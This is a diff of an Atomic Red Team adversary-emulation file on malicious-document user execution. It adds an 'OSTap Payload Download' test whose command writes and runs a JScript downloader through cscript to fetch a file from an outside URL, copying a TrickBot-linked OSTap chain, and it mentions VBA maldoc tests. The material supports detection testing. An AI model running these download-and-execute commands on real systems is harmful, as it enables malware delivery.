-- [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution)
+- [Atomic Test #2 - OSTap Payload Download](#atomic-test-2---ostap-payload-download)
-- [Atomic Test #3 - OSTAP JS version](#atomic-test-3---ostap-js-version)
+- [Atomic Test #3 - Maldoc choice flags command execution](#atomic-test-3---maldoc-choice-flags-command-execution)
+
+- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
@@ -21,7 +23,7 @@ While User Execution frequently occurs shortly after Initial Access it may occur
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -73,7 +75,42 @@ Stop-Process -Name WINWORD
-## Atomic Test #2 - Maldoc choice flags command execution
+## Atomic Test #2 - OSTap Payload Download
+Uses cscript //E:jscript to download a file
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
+| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+cscript //E:Jscript #{script_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{script_file} /F /Q >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
@@ -123,8 +160,8 @@ Stop-Process -Name WINWORD
-## Atomic Test #3 - OSTAP JS version
-Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
+## Atomic Test #4 - OSTAP JS version
+Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows